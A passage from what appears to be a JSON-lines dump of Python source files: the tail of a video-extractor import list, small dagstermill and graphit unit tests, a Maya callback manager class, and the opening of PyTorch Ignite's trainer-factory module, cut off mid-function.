Puls4IE\nfrom .pyvideo import PyvideoIE\nfrom .qqmusic import (\n QQMusicIE,\n QQMusicSingerIE,\n QQMusicAlbumIE,\n QQMusicToplistIE,\n QQMusicPlaylistIE,\n)\nfrom .r7 import (\n R7IE,\n R7ArticleIE,\n)\nfrom .radiko import RadikoIE, RadikoRadioIE\nfrom .radiocanada import (\n RadioCanadaIE,\n RadioCanadaAudioVideoIE,\n)\nfrom .radiode import RadioDeIE\nfrom .radiojavan import RadioJavanIE\nfrom .radiobremen import RadioBremenIE\nfrom .radiofrance import RadioFranceIE\nfrom .rai import (\n RaiPlayIE,\n RaiPlayLiveIE,\n RaiPlayPlaylistIE,\n RaiIE,\n)\nfrom .raywenderlich import (\n RayWenderlichIE,\n RayWenderlichCourseIE,\n)\nfrom .rbmaradio import RBMARadioIE\nfrom .rcs import (\n RCSIE,\n RCSEmbedsIE,\n RCSVariousIE,\n)\nfrom .rcti import (\n RCTIPlusIE,\n RCTIPlusSeriesIE,\n RCTIPlusTVIE,\n)\nfrom .rds import RDSIE\nfrom .redbulltv import (\n RedBullTVIE,\n RedBullEmbedIE,\n RedBullTVRrnContentIE,\n RedBullIE,\n)\nfrom .reddit import (\n RedditIE,\n RedditRIE,\n)\nfrom .redtube import RedTubeIE\nfrom .regiotv import RegioTVIE\nfrom .rentv import (\n RENTVIE,\n RENTVArticleIE,\n)\nfrom .restudy import RestudyIE\nfrom .reuters import ReutersIE\nfrom .reverbnation import ReverbNationIE\nfrom .rice import RICEIE\nfrom .rmcdecouverte import RMCDecouverteIE\nfrom .ro220 import Ro220IE\nfrom .rockstargames import RockstarGamesIE\nfrom .roosterteeth import RoosterTeethIE\nfrom .rottentomatoes import RottenTomatoesIE\nfrom .roxwel import RoxwelIE\nfrom .rozhlas import RozhlasIE\nfrom .rtbf import RTBFIE\nfrom .rte import RteIE, RteRadioIE\nfrom .rtlnl import RtlNlIE\nfrom .rtl2 import (\n RTL2IE,\n RTL2YouIE,\n RTL2YouSeriesIE,\n)\nfrom .rtp import RTPIE\nfrom .rts import RTSIE\nfrom .rtve import RTVEALaCartaIE, RTVELiveIE, RTVEInfantilIE, RTVELiveIE, RTVETelevisionIE\nfrom .rtvnh import RTVNHIE\nfrom .rtvs import RTVSIE\nfrom .ruhd import RUHDIE\nfrom .rumble import RumbleEmbedIE\nfrom .rutube import (\n RutubeIE,\n RutubeChannelIE,\n RutubeEmbedIE,\n RutubeMovieIE,\n RutubePersonIE,\n RutubePlaylistIE,\n)\nfrom .rutv import RUTVIE\nfrom .ruutu import RuutuIE\nfrom .ruv import RuvIE\nfrom .safari import (\n SafariIE,\n SafariApiIE,\n SafariCourseIE,\n)\nfrom .saitosan import SaitosanIE\nfrom .samplefocus import SampleFocusIE\nfrom .sapo import SapoIE\nfrom .savefrom import SaveFromIE\nfrom .sbs import SBSIE\nfrom .screencast import ScreencastIE\nfrom .screencastomatic import ScreencastOMaticIE\nfrom .scrippsnetworks import (\n ScrippsNetworksWatchIE,\n ScrippsNetworksIE,\n)\nfrom .scte import (\n SCTEIE,\n SCTECourseIE,\n)\nfrom .seeker import SeekerIE\nfrom .senateisvp import SenateISVPIE\nfrom .sendtonews import SendtoNewsIE\nfrom .servus import ServusIE\nfrom .sevenplus import SevenPlusIE\nfrom .sexu import SexuIE\nfrom .seznamzpravy import (\n SeznamZpravyIE,\n SeznamZpravyArticleIE,\n)\nfrom .shahid import (\n ShahidIE,\n ShahidShowIE,\n)\nfrom .shared import (\n SharedIE,\n VivoIE,\n)\nfrom .shemaroome import ShemarooMeIE\nfrom .showroomlive import ShowRoomLiveIE\nfrom .simplecast import (\n SimplecastIE,\n SimplecastEpisodeIE,\n SimplecastPodcastIE,\n)\nfrom .sina import SinaIE\nfrom .sixplay import SixPlayIE\nfrom .skyit import (\n SkyItPlayerIE,\n SkyItVideoIE,\n SkyItVideoLiveIE,\n SkyItIE,\n SkyItAcademyIE,\n SkyItArteIE,\n CieloTVItIE,\n TV8ItIE,\n)\nfrom .skylinewebcams import SkylineWebcamsIE\nfrom .skynewsarabia import (\n SkyNewsArabiaIE,\n SkyNewsArabiaArticleIE,\n)\nfrom .sky import (\n SkyNewsIE,\n SkySportsIE,\n SkySportsNewsIE,\n)\nfrom .slideshare import SlideshareIE\nfrom .slideslive import SlidesLiveIE\nfrom .slutload import SlutloadIE\nfrom .snotr import SnotrIE\nfrom .sohu import SohuIE\nfrom .sonyliv import (\n SonyLIVIE,\n SonyLIVSeriesIE,\n)\nfrom .soundcloud import (\n SoundcloudEmbedIE,\n SoundcloudIE,\n SoundcloudSetIE,\n SoundcloudUserIE,\n SoundcloudTrackStationIE,\n SoundcloudPlaylistIE,\n SoundcloudSearchIE,\n)\nfrom .soundgasm import (\n SoundgasmIE,\n SoundgasmProfileIE\n)\nfrom .southpark import (\n SouthParkIE,\n SouthParkDeIE,\n SouthParkDkIE,\n SouthParkEsIE,\n SouthParkNlIE\n)\nfrom .sovietscloset import (\n SovietsClosetIE,\n SovietsClosetPlaylistIE\n)\nfrom .spankbang import (\n SpankBangIE,\n SpankBangPlaylistIE,\n)\nfrom .spankwire import SpankwireIE\nfrom .spiegel import SpiegelIE\nfrom .spike import (\n BellatorIE,\n ParamountNetworkIE,\n)\nfrom .stitcher import (\n StitcherIE,\n StitcherShowIE,\n)\nfrom .sport5 import Sport5IE\nfrom .sportbox import SportBoxIE\nfrom .sportdeutschland import SportDeutschlandIE\nfrom .spotify import (\n SpotifyIE,\n SpotifyShowIE,\n)\nfrom .spreaker import (\n SpreakerIE,\n SpreakerPageIE,\n SpreakerShowIE,\n SpreakerShowPageIE,\n)\nfrom .springboardplatform import SpringboardPlatformIE\nfrom .sprout import SproutIE\nfrom .srgssr import (\n SRGSSRIE,\n SRGSSRPlayIE,\n)\nfrom .srmediathek import SRMediathekIE\nfrom .stanfordoc import StanfordOpenClassroomIE\nfrom .startv import StarTVIE\nfrom .steam import SteamIE\nfrom .storyfire import (\n StoryFireIE,\n StoryFireUserIE,\n StoryFireSeriesIE,\n)\nfrom .streamable import StreamableIE\nfrom .streamcloud import StreamcloudIE\nfrom .streamcz import StreamCZIE\nfrom .streetvoice import StreetVoiceIE\nfrom .stretchinternet import StretchInternetIE\nfrom .stv import STVPlayerIE\nfrom .sunporno import SunPornoIE\nfrom .sverigesradio import (\n SverigesRadioEpisodeIE,\n SverigesRadioPublicationIE,\n)\nfrom .svt import (\n SVTIE,\n SVTPageIE,\n SVTPlayIE,\n SVTSeriesIE,\n)\nfrom .swrmediathek import SWRMediathekIE\nfrom .syfy import SyfyIE\nfrom .sztvhu import SztvHuIE\nfrom .tagesschau import (\n TagesschauPlayerIE,\n TagesschauIE,\n)\nfrom .tass import TassIE\nfrom .tbs import TBSIE\nfrom .tdslifeway import TDSLifewayIE\nfrom .teachable import (\n TeachableIE,\n TeachableCourseIE,\n)\nfrom .teachertube import (\n TeacherTubeIE,\n TeacherTubeUserIE,\n)\nfrom .teachingchannel import TeachingChannelIE\nfrom .teamcoco import TeamcocoIE\nfrom .teamtreehouse import TeamTreeHouseIE\nfrom .techtalks import TechTalksIE\nfrom .ted import TEDIE\nfrom .tele5 import Tele5IE\nfrom .tele13 import Tele13IE\nfrom .telebruxelles import TeleBruxellesIE\nfrom .telecinco import TelecincoIE\nfrom .telegraaf import TelegraafIE\nfrom .telemb import TeleMBIE\nfrom .telemundo import TelemundoIE\nfrom .telequebec import (\n TeleQuebecIE,\n TeleQuebecSquatIE,\n TeleQuebecEmissionIE,\n TeleQuebecLiveIE,\n TeleQuebecVideoIE,\n)\nfrom .teletask import TeleTaskIE\nfrom .telewebion import TelewebionIE\nfrom .tennistv import TennisTVIE\nfrom .tenplay import TenPlayIE\nfrom .testurl import TestURLIE\nfrom .tf1 import TF1IE\nfrom .tfo import TFOIE\nfrom .theintercept import TheInterceptIE\nfrom .theplatform import (\n ThePlatformIE,\n ThePlatformFeedIE,\n)\nfrom .thescene import TheSceneIE\nfrom .thestar import TheStarIE\nfrom .thesun import TheSunIE\nfrom .theweatherchannel import TheWeatherChannelIE\nfrom .thisamericanlife import ThisAmericanLifeIE\nfrom .thisav import ThisAVIE\nfrom .thisoldhouse import ThisOldHouseIE\nfrom .threeqsdn import ThreeQSDNIE\nfrom .tiktok import (\n TikTokIE,\n TikTokUserIE,\n)\nfrom .tinypic import TinyPicIE\nfrom .tmz import TMZIE\nfrom .tnaflix import (\n TNAFlixNetworkEmbedIE,\n TNAFlixIE,\n EMPFlixIE,\n MovieFapIE,\n)\nfrom .toggle import (\n ToggleIE,\n MeWatchIE,\n)\nfrom .tokentube import (\n TokentubeIE,\n TokentubeChannelIE\n)\nfrom .tonline import TOnlineIE\nfrom .toongoggles import ToonGogglesIE\nfrom .toutv import TouTvIE\nfrom .toypics import ToypicsUserIE, ToypicsIE\nfrom .traileraddict import TrailerAddictIE\nfrom .trilulilu import TriluliluIE\nfrom .trovo import (\n TrovoIE,\n TrovoVodIE,\n)\nfrom .trunews import TruNewsIE\nfrom .trutv import TruTVIE\nfrom .tube8 import Tube8IE\nfrom .tubitv import (\n TubiTvIE,\n TubiTvShowIE,\n)\nfrom .tumblr import TumblrIE\nfrom .tunein import (\n TuneInClipIE,\n TuneInStationIE,\n TuneInProgramIE,\n TuneInTopicIE,\n TuneInShortenerIE,\n)\nfrom .tunepk import TunePkIE\nfrom .turbo import TurboIE\nfrom .tv2 import (\n TV2IE,\n TV2ArticleIE,\n KatsomoIE,\n MTVUutisetArticleIE,\n)\nfrom .tv2dk import (\n TV2DKIE,\n TV2DKBornholmPlayIE,\n)\nfrom .tv2hu import (\n TV2HuIE,\n TV2HuSeriesIE,\n)\nfrom .tv4 import TV4IE\nfrom .tv5mondeplus import TV5MondePlusIE\nfrom .tv5unis import (\n TV5UnisVideoIE,\n TV5UnisIE,\n)\nfrom .tva import (\n TVAIE,\n QubIE,\n)\nfrom .tvanouvelles import (\n TVANouvellesIE,\n TVANouvellesArticleIE,\n)\nfrom .tvc import (\n TVCIE,\n TVCArticleIE,\n)\nfrom .tver import TVerIE\nfrom .tvigle import TvigleIE\nfrom .tvland import TVLandIE\nfrom .tvn24 import TVN24IE\nfrom .tvnet import TVNetIE\nfrom .tvnoe import TVNoeIE\nfrom .tvnow import (\n TVNowIE,\n TVNowFilmIE,\n TVNowNewIE,\n TVNowSeasonIE,\n TVNowAnnualIE,\n TVNowShowIE,\n)\nfrom .tvp import (\n TVPEmbedIE,\n TVPIE,\n TVPWebsiteIE,\n)\nfrom .tvplay import (\n TVPlayIE,\n ViafreeIE,\n TVPlayHomeIE,\n)\nfrom .tvplayer import TVPlayerIE\nfrom .tweakers import TweakersIE\nfrom .twentyfourvideo import TwentyFourVideoIE\nfrom .twentymin import TwentyMinutenIE\nfrom .twentythreevideo import TwentyThreeVideoIE\nfrom .twitcasting import (\n TwitCastingIE,\n TwitCastingLiveIE,\n TwitCastingUserIE,\n)\nfrom .twitch import (\n TwitchVodIE,\n TwitchCollectionIE,\n TwitchVideosIE,\n TwitchVideosClipsIE,\n TwitchVideosCollectionsIE,\n TwitchStreamIE,\n TwitchClipsIE,\n)\nfrom .twitter import (\n TwitterCardIE,\n TwitterIE,\n TwitterAmplifyIE,\n TwitterBroadcastIE,\n TwitterShortenerIE,\n)\nfrom .udemy import (\n UdemyIE,\n UdemyCourseIE\n)\nfrom .udn import UDNEmbedIE\nfrom .ufctv import (\n UFCTVIE,\n UFCArabiaIE,\n)\nfrom .ukcolumn import UkColumnIE\nfrom .uktvplay import UKTVPlayIE\nfrom .digiteka import DigitekaIE\nfrom .dlive import (\n DLiveVODIE,\n DLiveStreamIE,\n)\nfrom .umg import UMGDeIE\nfrom .unistra import UnistraIE\nfrom .unity import UnityIE\nfrom .uol import UOLIE\nfrom .uplynk import (\n UplynkIE,\n UplynkPreplayIE,\n)\nfrom .urort import UrortIE\nfrom .urplay import URPlayIE\nfrom .usanetwork import USANetworkIE\nfrom .usatoday import USATodayIE\nfrom .ustream import UstreamIE, UstreamChannelIE\nfrom .ustudio import (\n UstudioIE,\n UstudioEmbedIE,\n)\nfrom .utreon import UtreonIE\nfrom .varzesh3 import Varzesh3IE\nfrom .vbox7 import Vbox7IE\nfrom .veehd import VeeHDIE\nfrom .veoh import VeohIE\nfrom .vesti import VestiIE\nfrom .vevo import (\n VevoIE,\n VevoPlaylistIE,\n)\nfrom .vgtv import (\n BTArticleIE,\n BTVestlendingenIE,\n VGTVIE,\n)\nfrom .vh1 import VH1IE\nfrom .vice import (\n ViceIE,\n ViceArticleIE,\n ViceShowIE,\n)\nfrom .vidbit import VidbitIE\nfrom .viddler import ViddlerIE\nfrom .videa import VideaIE\nfrom .videodetective import VideoDetectiveIE\nfrom .videofyme import VideofyMeIE\nfrom .videomore import (\n VideomoreIE,\n VideomoreVideoIE,\n VideomoreSeasonIE,\n)\nfrom .videopress import VideoPressIE\nfrom .vidio import (\n VidioIE,\n VidioPremierIE,\n VidioLiveIE\n)\nfrom .vidlii import VidLiiIE\nfrom .vidme import (\n VidmeIE,\n VidmeUserIE,\n VidmeUserLikesIE,\n)\nfrom .vier import VierIE, VierVideosIE\nfrom .viewlift import (\n ViewLiftIE,\n ViewLiftEmbedIE,\n)\nfrom .viidea import ViideaIE\nfrom .vimeo import (\n VimeoIE,\n VimeoAlbumIE,\n VimeoChannelIE,\n VimeoGroupsIE,\n VimeoLikesIE,\n VimeoOndemandIE,\n VimeoReviewIE,\n VimeoUserIE,\n VimeoWatchLaterIE,\n VHXEmbedIE,\n)\nfrom .vimple import VimpleIE\nfrom .vine import (\n VineIE,\n VineUserIE,\n)\nfrom .viki import (\n VikiIE,\n VikiChannelIE,\n)\nfrom .viqeo import ViqeoIE\nfrom .viu import (\n ViuIE,\n ViuPlaylistIE,\n ViuOTTIE,\n)\nfrom .vk import (\n VKIE,\n VKUserVideosIE,\n VKWallPostIE,\n)\nfrom .vlive import (\n VLiveIE,\n VLivePostIE,\n VLiveChannelIE,\n)\nfrom .vodlocker import VodlockerIE\nfrom .vodpl import VODPlIE\nfrom .vodplatform import VODPlatformIE\nfrom .voicerepublic import VoiceRepublicIE\nfrom .voicy import (\n VoicyIE,\n VoicyChannelIE,\n)\nfrom .voot import (\n VootIE,\n VootSeriesIE,\n)\nfrom .voxmedia import (\n VoxMediaVolumeIE,\n VoxMediaIE,\n)\nfrom .vrt import VRTIE\nfrom .vrak import VrakIE\nfrom .vrv import (\n VRVIE,\n VRVSeriesIE,\n)\nfrom .vshare import VShareIE\nfrom .vtm import VTMIE\nfrom .medialaan import MedialaanIE\nfrom .vube import VubeIE\nfrom .vuclip import VuClipIE\nfrom .vvvvid import (\n VVVVIDIE,\n VVVVIDShowIE,\n)\nfrom .vyborymos import VyboryMosIE\nfrom .vzaar import VzaarIE\nfrom .wakanim import WakanimIE\nfrom .walla import WallaIE\nfrom .washingtonpost import (\n WashingtonPostIE,\n WashingtonPostArticleIE,\n)\nfrom .wat import WatIE\nfrom .watchbox import WatchBoxIE\nfrom .watchindianporn import WatchIndianPornIE\nfrom .wdr import (\n WDRIE,\n WDRPageIE,\n WDRElefantIE,\n WDRMobileIE,\n)\nfrom .webcaster import (\n WebcasterIE,\n WebcasterFeedIE,\n)\nfrom .webofstories import (\n WebOfStoriesIE,\n WebOfStoriesPlaylistIE,\n)\nfrom .weibo import (\n WeiboIE,\n WeiboMobileIE\n)\nfrom .weiqitv import WeiqiTVIE\nfrom .wimtv import WimTVIE\nfrom .whowatch import WhoWatchIE\nfrom .wistia import (\n WistiaIE,\n WistiaPlaylistIE,\n)\nfrom .worldstarhiphop import WorldStarHipHopIE\nfrom .wsj import (\n WSJIE,\n WSJArticleIE,\n)\nfrom .wwe import WWEIE\nfrom .xbef import XBefIE\nfrom .xboxclips import XboxClipsIE\nfrom .xfileshare import XFileShareIE\nfrom .xhamster import (\n XHamsterIE,\n XHamsterEmbedIE,\n XHamsterUserIE,\n)\nfrom .xiami import (\n XiamiSongIE,\n XiamiAlbumIE,\n XiamiArtistIE,\n XiamiCollectionIE\n)\nfrom .ximalaya import (\n XimalayaIE,\n XimalayaAlbumIE\n)\nfrom .xminus import XMinusIE\nfrom .xnxx import XNXXIE\nfrom .xstream import XstreamIE\nfrom .xtube import XTubeUserIE, XTubeIE\nfrom .xuite import XuiteIE\nfrom .xvideos import XVideosIE\nfrom .xxxymovies import XXXYMoviesIE\nfrom .yahoo import (\n YahooIE,\n YahooSearchIE,\n YahooGyaOPlayerIE,\n YahooGyaOIE,\n YahooJapanNewsIE,\n)\nfrom .yandexdisk import YandexDiskIE\nfrom .yandexmusic import (\n YandexMusicTrackIE,\n YandexMusicAlbumIE,\n YandexMusicPlaylistIE,\n YandexMusicArtistTracksIE,\n YandexMusicArtistAlbumsIE,\n)\nfrom .yandexvideo import YandexVideoIE\nfrom .yapfiles import YapFilesIE\nfrom .yesjapan import YesJapanIE\nfrom .yinyuetai import YinYueTaiIE\nfrom .ynet import YnetIE\nfrom .youjizz import YouJizzIE\nfrom .youku import (\n YoukuIE,\n YoukuShowIE,\n)\nfrom .younow import (\n YouNowLiveIE,\n YouNowChannelIE,\n YouNowMomentIE,\n)\nfrom .youporn import YouPornIE\nfrom .yourporn import YourPornIE\nfrom .yourupload import YourUploadIE\nfrom .youtube import (\n YoutubeIE,\n YoutubeFavouritesIE,\n YoutubeHistoryIE,\n YoutubeTabIE,\n YoutubePlaylistIE,\n YoutubeRecommendedIE,\n YoutubeSearchDateIE,\n YoutubeSearchIE,\n YoutubeSearchURLIE,\n YoutubeSubscriptionsIE,\n YoutubeTruncatedIDIE,\n YoutubeTruncatedURLIE,\n YoutubeYtBeIE,\n YoutubeYtUserIE,\n YoutubeWatchLaterIE,\n)\nfrom .zapiks import ZapiksIE\nfrom .zattoo import (\n BBVTVIE,\n EinsUndEinsTVIE,\n EWETVIE,\n GlattvisionTVIE,\n MNetTVIE,\n MyVisionTVIE,\n NetPlusIE,\n OsnatelTVIE,\n QuantumTVIE,\n QuicklineIE,\n QuicklineLiveIE,\n SaltTVIE,\n SAKTVIE,\n VTXTVIE,\n WalyTVIE,\n ZattooIE,\n ZattooLiveIE,\n)\nfrom .zdf import ZDFIE, ZDFChannelIE\nfrom .zee5 import (\n Zee5IE,\n Zee5SeriesIE,\n)\nfrom .zhihu import ZhihuIE\nfrom .zingmp3 import (\n ZingMp3IE,\n ZingMp3AlbumIE,\n)\nfrom .zoom import ZoomIE\nfrom .zype import ZypeIE\n"} {"ext": "py", "sha": "1a309402d864a31e994ffddb348a018bcad1fd82", "content": "from dagstermill.examples.repository import notebook_repo\n\nfrom dagster import RepositoryDefinition\n\n\ndef test_dagstermill_repo():\n assert isinstance(notebook_repo, RepositoryDefinition)\n"} {"ext": "py", "sha": "1a30941ed183698b3a0aea20efec96af8d46f379", "content": "# -*- coding: utf-8 -*-\n\n\"\"\"\nfile: module_graph_copy_test.py\n\nUnit tests for Graph copy related methods\n\"\"\"\n\nimport copy\n\nfrom unittest_baseclass import UnittestPythonCompatibility\n\nfrom graphit import Graph\n\n\nclass TestGraphCopy(UnittestPythonCompatibility):\n \"\"\"\n Test Graph copy and deepcopy methods\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Build default graph with nodes, edges and attributes\n \"\"\"\n\n self.graph = Graph()\n self.graph.add_nodes([('g', {'weight': 1.0}), ('r', {'weight': 1.5}), ('a', {'weight': 2.0}),\n ('p', {'weight': 2.5}), ('h', {'weight': 3.0})])\n self.graph.add_edges([(1, 2), (2, 3), (3, 4), (3, 5), (4, 5)], isedge=True)\n\n def tearDown(self):\n \"\"\"\n Test copied state\n Testing equality in node, edge and adjacency data stores is based on\n the internal '_storage' object and not so much the storage object\n itself which is often just a wrapper.\n \"\"\"\n\n # Main Graph object is new\n self.assertTrue(id(self.copied) != id(self.graph))\n\n if self.shallow:\n\n # Internal node and edge stores point to parent.\n self.assertEqual(id(self.copied.nodes._storage), id(self.graph.nodes._storage))\n self.assertEqual(id(self.copied.edges._storage), id(self.graph.edges._storage))\n\n # ORM and origin objects point to parent\n self.assertEqual(id(self.copied.orm), id(self.graph.orm))\n self.assertEqual(id(self.copied.origin), id(self.graph.origin))\n\n else:\n\n # Internal node and edge stores point to parent.\n self.assertNotEqual(id(self.copied.nodes._storage), id(self.graph.nodes._storage))\n self.assertNotEqual(id(self.copied.edges._storage), id(self.graph.edges._storage))\n\n # ORM and origin objects point to parent\n self.assertNotEqual(id(self.copied.orm), id(self.graph.orm))\n self.assertNotEqual(id(self.copied.origin), id(self.graph.origin))\n\n def test_graph_copy_shallow(self):\n \"\"\"\n Test making a shallow copy of a graph. This essentially copies the\n Graph object while linking tot the data store in the parent Graph\n \"\"\"\n\n self.shallow = True\n self.copied = self.graph.copy(deep=False)\n\n def test_graph_copy_deep(self):\n \"\"\"\n Test making a deep copy of a graph (default) copying everything\n \"\"\"\n\n self.shallow = False\n self.copied = self.graph.copy()\n\n def test_graph_buildin_copy_shallow(self):\n \"\"\"\n Test making a shallow copy of a graph using the 'copy' method of the\n copy class. This calls the Graph.copy method\n \"\"\"\n\n self.shallow = True\n self.copied = copy.copy(self.graph)\n\n def test_graph_buildin_copy_deep(self):\n \"\"\"\n Test making a deep copy of a graph using the 'deepcopy' method of the\n copy class. This calls the Graph.copy method\n \"\"\"\n\n self.shallow = False\n self.copied = copy.deepcopy(self.graph)\n\n def test_graph_buildin_copy_deep_view(self):\n \"\"\"\n Test copying subgraphs either with the set 'view' only or the full\n origin graph (full graph)\n \"\"\"\n\n # Regular copy\n self.shallow = False\n self.copied = copy.deepcopy(self.graph)\n\n # Build subgraph, same origin\n view = self.graph.getnodes([3,4,5])\n self.assertEqual(id(view.origin), id(self.graph.origin))\n\n # Deep copy with or without view, different origin\n copy_view = view.copy(deep=True, copy_view=False)\n copy_full = view.copy(deep=True, copy_view=True)\n self.assertNotEqual(id(copy_view.origin), id(self.graph.origin))\n self.assertNotEqual(id(copy_full.origin), id(self.graph.origin))\n\n # Subgraph 'view' should be identical to the original\n # regardless the copy mode\n self.assertEqual(copy_view.nodes.keys(), view.nodes.keys())\n self.assertEqual(copy_view.edges.keys(), view.edges.keys())\n self.assertEqual(copy_view.adjacency.keys(), view.adjacency.keys())\n self.assertEqual(copy_full.nodes.keys(), view.nodes.keys())\n self.assertEqual(copy_full.edges.keys(), view.edges.keys())\n self.assertEqual(copy_full.adjacency.keys(), view.adjacency.keys())\n\n # The view copy origin should either be identical to the view\n # (copy_view = True) or to the full graph (copy_view = False)\n self.assertEqual(list(copy_view.nodes._storage.keys()), list(view.nodes.keys()))\n self.assertEqual(list(copy_full.nodes._storage.keys()), list(view.origin.nodes.keys()))\n\n # The copy_full has its origin equals self and thus copy_full.origin.nodes\n # equals copy_full.nodes. However, the view is also set which means that\n # by default the full graph is not accessible without resetting it\n copy_full.nodes.reset_view()\n self.assertEqual(copy_full.nodes.keys(), self.graph.nodes.keys())\n"} {"ext": "py", "sha": "1a3094508c7ffe16aced913876d5f4737a3bc88b", "content": "\"\"\"\n## SCRIPT HEADER ##\n\nCreated By : Muhammad Fredo\nEmail : muhammadfredo@gmail.com\nStart Date : 03 Nov 2020\nInfo :\n\nalternative_callback_data: header data\n \"id\": (callback id)\n \"event_name\": \"after_open\"\n \"callback_tag\": fr_maya\n\nmaya_event_callbacks:\n after_open:\n event_id: event_id,\n add_callback: om callback function\n before_open:\n event_id: event_id,\n add_callback: om callback function\n\"\"\"\nimport copy\nimport inspect\nimport re\n\nimport maya.OpenMaya as om\n# TODO: update to api 2.0 ??\n\nfrom FrMaya import utility as util\n\n\nclass MyCallbackManager(object):\n __metaclass__ = util.MetaSingleton\n\n @staticmethod\n def get_maya_event_callback():\n \"\"\"\n Return dictionary data of Maya events callback.\n\n after_open:\n event_id: event_id,\n\n add_callback: open Maya callback function.\n before_open:\n event_id: event_id,\n\n add_callback: open Maya callback function.\n :rtype: dict\n \"\"\"\n # example regex subs -> re.sub(r\"(\\w)([A-Z])\", r\"\\1 \\2\", \"WordWordWord\")\n callback_events = {}\n re_pattern = re.compile(r'(?<=\\w)([A-Z])')\n for event_name, event_id in inspect.getmembers(om.MSceneMessage):\n if event_name.startswith('k') and not event_name.endswith('check'):\n if not callback_events.get(event_name):\n key_name = re_pattern.sub(r'_\\1', event_name[1:])\n callback_events[key_name.lower()] = {\n 'event_id': event_id,\n 'add_callback': om.MSceneMessage.addCallback,\n }\n\n return callback_events\n\n def __init__(self):\n \"\"\"Class to manage callback for FrMaya system.\"\"\"\n print 'initialize callback manager'\n self._maya_event_callback = {}\n self._registered_callback = {}\n\n self._maya_event_callback = copy.deepcopy(self.get_maya_event_callback())\n\n assert len(self._maya_event_callback) > 0, ''\n\n def _group_registered_callbacks(self):\n \"\"\"\n Return registered callbacks based on events or tags callback.\n\n events:\n event_name: [callback function name, ..],\n\n tags:\n callback_tag: [callback function name, ..],\n\n :rtype: dict\n \"\"\"\n result_data = {'events': {}, 'tags': {}}\n for cb_fn_name, cb_data in self._registered_callback.items():\n for each in result_data:\n if each == 'events':\n event_or_tag = cb_data['event_name']\n elif each == 'tags':\n event_or_tag = cb_data['callback_tag']\n else:\n return None\n\n if result_data[each].get(event_or_tag):\n result_data[each][event_or_tag].append(cb_fn_name)\n else:\n result_data[each][event_or_tag] = [cb_fn_name]\n return result_data\n\n def add_callback(self, event_name, callback_tag, func):\n \"\"\"\n Return True if it success add callback to callback manager, False otherwise.\n\n :arg event_name: Maya event nice name.\n :type event_name: str\n :arg callback_tag: A tag to group callback in callback manager.\n :type callback_tag: str\n :arg func: Python function.\n :rtype: bool\n \"\"\"\n my_event_cb = self._maya_event_callback.get(event_name)\n\n if my_event_cb:\n callback_id = my_event_cb['add_callback'](my_event_cb['event_id'], func)\n\n self._registered_callback[func.__module__] = {\n 'event_name': event_name,\n 'callback_tag': callback_tag,\n 'callback_id': callback_id\n }\n\n return True\n else:\n return False\n\n def remove_callback(self, event_name = '', callback_tag = ''):\n \"\"\"\n Remove callback based on specified keyword argument.\n If both keyword specified, it will performed both action.\n\n :key event_name: Maya event name callback which want to removed.\n :type event_name: str\n :key callback_tag: Callback tag which want to removed.\n :type callback_tag: str\n \"\"\"\n callback_collection = self._group_registered_callbacks()\n\n cb_id_array = om.MCallbackIdArray()\n cb_fn_name_list = []\n if event_name:\n cb_fn_name_list.extend(callback_collection['events'].get(event_name, []))\n if callback_tag:\n cb_fn_name_list.extend(callback_collection['tags'].get(callback_tag, []))\n\n for cb_fn_name in cb_fn_name_list:\n cb_id_array.append(self._registered_callback[cb_fn_name]['callback_id'])\n\n if cb_id_array:\n om.MMessage.removeCallbacks(cb_id_array)\n\n def show_registered_callback(self, event_name = '', callback_tag = ''):\n \"\"\"\n Return registered callback based on specified keyword,\n if both keyword did not specified, it will return both group data (event name and tag).\n\n :key event_name: Maya event name callback which callback group want to retrieved.\n :type event_name: str\n :key callback_tag: Callback tag which callback group want to retrieved.\n :type callback_tag: str\n :rtype: dict or list\n \"\"\"\n result = self._group_registered_callbacks()\n\n if event_name:\n return result['events'].get(event_name, [])\n elif callback_tag:\n return result['tags'].get(callback_tag, [])\n else:\n return copy.deepcopy(result)\n\n def show_maya_event_name(self):\n \"\"\"\n Return list of Maya event nice name.\n\n :rtype: list of str\n \"\"\"\n return self._maya_event_callback.keys()\n\n\n"} {"ext": "py", "sha": "1a3094c7e76a67f7b55294278aceb4240f2068ed", "content": "from typing import Sequence, Union, Optional, Callable, Dict, Any, Tuple\nimport torch\n\nfrom ignite.engine.engine import Engine\nfrom ignite.engine.events import State, Events, EventEnum, CallableEventWithFilter\nfrom ignite.utils import convert_tensor\nfrom ignite.metrics import Metric\n\n__all__ = [\n \"State\",\n \"create_supervised_trainer\",\n \"create_supervised_evaluator\",\n \"Engine\",\n \"Events\",\n \"EventEnum\",\n \"CallableEventWithFilter\",\n]\n\n\ndef _prepare_batch(\n batch: Sequence[torch.Tensor], device: Optional[Union[str, torch.device]] = None, non_blocking: bool = False\n):\n \"\"\"Prepare batch for training: pass to a device with options.\n\n \"\"\"\n x, y = batch\n return (\n convert_tensor(x, device=device, non_blocking=non_blocking),\n convert_tensor(y, device=device, non_blocking=non_blocking),\n )\n\n\ndef create_supervised_trainer(\n model: torch.nn.Module,\n optimizer: torch.optim.Optimizer,\n loss_fn: Union[Callable, torch.nn.Module],\n device: Optional[Union[str, torch.device]] = None,\n non_blocking: bool = False,\n prepare_batch: Callable = _prepare_batch,\n output_transform: Callable = lambda x, y, y_pred, loss: loss.item(),\n) -> Engine:\n \"\"\"\n Factory function for creating a trainer for supervised models.\n\n Args:\n model (`torch.nn.Module`): the model to train.\n optimizer (`torch.optim.Optimizer`): the optimizer to use.\n loss_fn (torch.nn loss function): the loss function to use.\n device (str, optional): device type specification (default: None).\n Applies to batches after starting the engine. Model *will not* be moved.\n Device can be CPU, GPU or TPU.\n non_blocking (bool, optional): if True and this copy is between CPU and GPU, the copy may occur asynchronously\n with respect to the host. For other cases, this argument has no effect.\n prepare_batch (callable, optional): function that receives `batch`, `device`, `non_blocking` and outputs\n tuple of tensors `(batch_x, batch_y)`.\n output_transform (callable, optional): function that receives 'x', 'y', 'y_pred', 'loss' and returns value\n to be assigned to engine's state.output after each iteration. Default is returning `loss.item()`.\n\n Note:\n `engine.state.output` for this engine is defind by `output_transform` parameter and is the loss\n of the processed batch by default.\n\n .. warning::\n\n The internal use of `device` has changed.\n `device` will now *only* be used to move the input data to the correct device.\n The `model` should be moved by the user before creating an optimizer.\n\n For more information see:\n\n * `PyTorch Documentation `_\n * `PyTorch's Explanation `_\n\n Returns:\n Engine: a trainer engine with supervised update function.\n \"\"\"\n\n device_type = device.type if isinstance(device, torch.device) else device\n on_tpu = \"xla\" in device_type if device_type is not None else 